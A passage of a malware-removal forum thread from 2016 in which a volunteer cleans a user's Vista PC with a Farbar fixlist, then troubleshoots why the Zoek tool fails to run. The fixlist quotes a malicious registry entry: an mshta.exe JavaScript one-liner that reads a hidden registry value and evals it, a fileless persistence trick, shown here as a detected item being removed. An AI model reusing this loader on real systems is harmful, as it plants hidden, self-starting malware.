Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
C:\Users\Pat\AppData\Local\Temp\a.txt
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**uxetnbtsu<*> => value removed successfully.
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk => moved successfully
C:\Windows\System32\mshta.exe => moved successfully
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk => moved successfully
C:\Windows\System32\cmd.exe => moved successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully.
"HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A057A204-BACC-4D26-9990-79A187E2698E} => value removed successfully.
HKCR\CLSID\{A057A204-BACC-4D26-9990-79A187E2698E} => key not found. 
"HKLM\Software\MozillaPlugins\@google.com/npPicasa2,version=2.0.0" => key removed successfully.
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
Net Driver HPZ12 => service removed successfully.
Pml Driver HPZ12 => service removed successfully.
blbdrive => service removed successfully.
IpInIp => service removed successfully.
NwlnkFlt => service removed successfully.
NwlnkFwd => service removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{53D7B34F-D449-492F-8394-5B7E046BF41C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53D7B34F-D449-492F-8394-5B7E046BF41C}" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WSE_Astromenda => key not found. 
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9" => key removed successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{79EDF414-9663-4A80-B368-517149062D16} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{65A496F2-7E8F-4B44-B0F1-8780C8544656} => value removed successfully.
"C:\Users\Pat\AppData\Local\Temp\a.txt" => not found.
"C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk" => not found.
"C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk" => not found.
"C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10794893 B
Java, Flash, Steam htmlcache => 4649 B
Windows/system/drivers => 1753129 B
Edge => 0 B
Chrome => 532212267 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 392553 B
LocalService => 66228 B
NetworkService => 38187039 B
Pat => 3609742379 B
 
RecycleBin => 86065 B
EmptyTemp: => 3.9 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:46:21 ====


#4 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 07 November 2016 - 09:39 AM

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyclsid;
emptyffcache;
FFdefaults;
emptyiecache;
iedefaults;
emptychrcache;
CHRdefaults;
emptyalltemp;
emptyfolderscheck;delete
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

#5 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 07 November 2016 - 01:19 PM

When I try to open the zoek.exe I get the following error message:

 

Windows can not find 'C:\Users\Pat\AppData\Local\Temp\4637.tmp\zoek-install.bat'  Make sure you type the name correctly, and try again.



#6 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 08 November 2016 - 09:43 AM

Make sure that the Zoek program is on your desktop and run it from there as an Administrator.

#7 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 08 November 2016 - 12:58 PM

Same results.  Is it compatible with Vista?


Edited by pkight, 08 November 2016 - 01:14 PM.


#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 09 November 2016 - 09:47 AM

http://www.winhelponline.com/articles/105/1/


I suspect that the file association for the .bat file is corrupted.

Fix it . Download the bat file suggested here.

http://www.winhelponline.com/blog/file-association-fixes-for-windows-vista/

Execute it as suggested on the page.

Restart the computer when done.

Try to run the Zoek program as an administrator now.

#9 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 09 November 2016 - 01:52 PM

This time the following error message appears:

 

Windows can not find 'C:\Users\Pat\AppData\Local\Temp\7cFc.tmp\zoek-install.bat'  Make sure you type the name correctly, and try again.



#10 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 10 November 2016 - 09:29 AM


It's not a file association issue. Lets check the PATH.

Refer to this page.
http://www.computerhope.com/issues/ch000549.htm

Note the PATH string listed in the System variable box.
Post it for my review.

Also lets check the location of these files.

Please run the Farbar Recovery Scan Tool. Enter zoek-install.bat;Zoek.exe in the Search Box and hit the File Search button.
Post the content of the Search.txt in your next reply.

#11 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 10 November 2016 - 05:16 PM

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip

 

 

 

 

Farbar Recovery Scan Tool (x86) Version: 06-11-2016
Ran by Pat (10-11-2016 14:08:40)
Running from c:\Users\Pat\Documents\Documents\Documents\Downloads
Boot Mode: Normal
 
================== Search Files: "zoek-install.bat;Zoek.exe" =============
 
C:\Users\Pat\Documents\Documents\Documents\Downloads\zoek.exe
[2016-11-08 10:13][2016-11-08 10:13] 1309184 ____A () 7EA0260488F304D68067A50B33A23AC2 [File not signed]
 
C:\Users\Pat\Documents\Documents\Documents\Documents\Documents\Desktop\zoek.exe
[2016-11-07 10:09][2016-11-07 10:09] 1309184 ____A () 7EA0260488F304D68067A50B33A23AC2 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\CEF8.tmp\zoek-install.bat
[2016-11-08 10:01][2016-11-08 10:01] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\A5E5.tmp\zoek-install.bat
[2016-11-08 10:13][2016-11-08 10:13] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\A0F5.tmp\zoek-install.bat
[2016-11-08 09:55][2016-11-08 09:55] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\9C06.tmp\zoek-install.bat
[2016-11-08 09:54][2016-11-08 09:54] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\936E.tmp\zoek-install.bat
[2016-11-08 09:58][2016-11-08 09:58] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\85C2.tmp\zoek-install.bat
[2016-11-09 10:52][2016-11-09 10:52] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\7CFC.tmp\zoek-install.bat
[2016-11-09 10:47][2016-11-09 10:47] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\7242.tmp\zoek-install.bat
[2016-11-09 10:16][2016-11-09 10:16] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\6B25.tmp\zoek-install.bat
[2016-11-07 10:10][2016-11-07 10:10] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\6A3B.tmp\zoek-install.bat
[2016-11-07 10:11][2016-11-07 10:11] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\5AF1.tmp\zoek-install.bat
[2016-11-08 09:51][2016-11-08 09:51] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\4637.tmp\zoek-install.bat
[2016-11-07 10:13][2016-11-07 10:13] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\1A28.tmp\zoek-install.bat
[2016-11-07 10:11][2016-11-07 10:11] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
====== End of Search ======


#12 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 11 November 2016 - 09:26 AM


If this is the only string in your PATH it's been corrupted.

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip

Check again.

Refer to the Environment Variable image on this page.
http://www.computerhope.com/issues/ch000549.htm

Open the Environment Variable on your Computer as you did before.

Make suge the PATH variable is highlighted (has the focus)

Click the Edit button.

Now you should be able to see the complete string.

Make a note of it.

Do not change anything just press the CLOSE button when finish.

Please post the string for my review.

===

#13 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 11 November 2016 - 09:45 AM

CLASSPATH

 

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip



#14 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 11 November 2016 - 10:16 AM


Are you working in a Linux environment, or a virtual machine?

I take it that you only have a CLASSPATH?
That the variable PATH is not available.

FYI and mine.
http://www.java67.com/2012/08/what-is-path-and-classpath-in-java-difference.html

#15 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 11 November 2016 - 01:54 PM

Sorry about that. I didn't scroll down far enough to see the PATH.

 

PATH

C:\Program Files\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Intel\DMIX;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\9.0\DLLShared\;C:\Program Files\Common Files\HP\Digital Imaging\\bin;C:\Program Files\jZip;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%PROGRAMFILES%\Internet Explorer;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Windows Live\Shared






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users